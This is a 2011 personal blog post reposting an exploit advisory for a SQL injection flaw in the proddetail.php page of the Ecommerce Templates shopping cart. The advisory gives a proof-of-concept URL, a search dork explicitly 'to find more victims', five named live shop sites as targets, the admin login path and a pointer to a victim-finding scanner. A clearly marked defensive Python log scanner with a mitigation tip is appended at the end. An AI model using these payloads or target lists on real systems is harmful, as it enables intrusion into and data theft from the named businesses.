.: Dee Personal Blog :.

Shopping Cart Software by Ecommerce Templates SQLi Vulnerability By : X-Cisadane

Posted on September 10, 2011 at 1:45 PM

 

=========================================================================

Shopping Cart Software by Ecommerce Templates SQLInjection Vulnerability

=========================================================================

:-------------------------------------------------------------------------------------------------------------------------:

: # Exploit Title : Shopping Cart Software by Ecommerce Templates SQLInjection Vulnerability

: # Date : 11 September 2011

: # Author : X-Cisadane

: # Software Link : http://www.ecommercetemplates.com/

: # Version : 5.x

: # Category : Web Applications

: # Vulnerability : SQL Injection Vulnerability

: # Tested On : Mozilla Firefox 5.x (Windows)

: # Dorks : inurl:/proddetail.php?prod= (To find more victims, use this dork: inurl:/proddetail.php?prod= site:my)

: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari

:-------------------------------------------------------------------------------------------------------------------------:

PoC : http://site/proddetail.php?prod='SQLi

 


Examples :

http://www.nasamarine.com/proddetail.php?prod=ais_engine'

http://www.sizzlinwatches.com/proddetail.php?prod=sizz_auto_001'

http://essentialphotogear.com/proddetail.php?prod=MP'

http://www.spacetoys.com/proddetail.php?prod=CST11'

http://www.devmr.com/proddetail.php?prod=gingerettestin'


Admin Login :

http://site/vsadmin/login.php

 


P.S : If you want an easy way to find victims, just use an SQLi scanner, for example X-Code Exploit Scanner (made by Poni of X-Code) : http://ferdianelli.wordpress.com/2011/01/08/update-08-jan-2011-xcode-sqlilfixss-vulnurable-webshell-scanner/
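
A defender-side check for the probe shown in the PoC, as an added example that is not part of the original post: it scans web access log lines for requests to proddetail.php whose prod value is not a plain product ID. The allowlist pattern, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate product IDs look like the ones in the post
# (ais_engine, sizz_auto_001, MP, CST11): letters, digits, underscore, hyphen.
SAFE_PROD = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Client IP, request target and status from a combined-format access log line.
REQUEST = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def suspicious_prod_requests(lines):
    """Return (ip, status, decoded prod value) for proddetail.php requests
    whose prod parameter falls outside the product-ID allowlist."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/proddetail.php"):
            continue
        # parse_qs percent-decodes, so a raw ' and %27 are treated alike.
        for value in parse_qs(url.query, keep_blank_values=True).get("prod", []):
            if not SAFE_PROD.fullmatch(value):
                hits.append((m.group("ip"), int(m.group("status")), value))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Sep/2011:10:00:01 +0000] "GET /proddetail.php?prod=CST11 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Sep/2011:10:00:05 +0000] "GET /proddetail.php?prod=CST11\' HTTP/1.1" 500 312',
    '203.0.113.9 - - [11/Sep/2011:10:00:09 +0000] "GET /proddetail.php?prod=MP%27 HTTP/1.1" 200 4098',
    '198.51.100.7 - - [11/Sep/2011:10:00:12 +0000] "GET /products.php?cat=3 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, status, value in suspicious_prod_requests(SAMPLE_LOG):
        print(f"{ip} status={status} prod={value!r}")
```

The same allowlist can be enforced in the application before the value reaches the database, alongside a parameterized query for the product lookup.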

Categories: Exploit
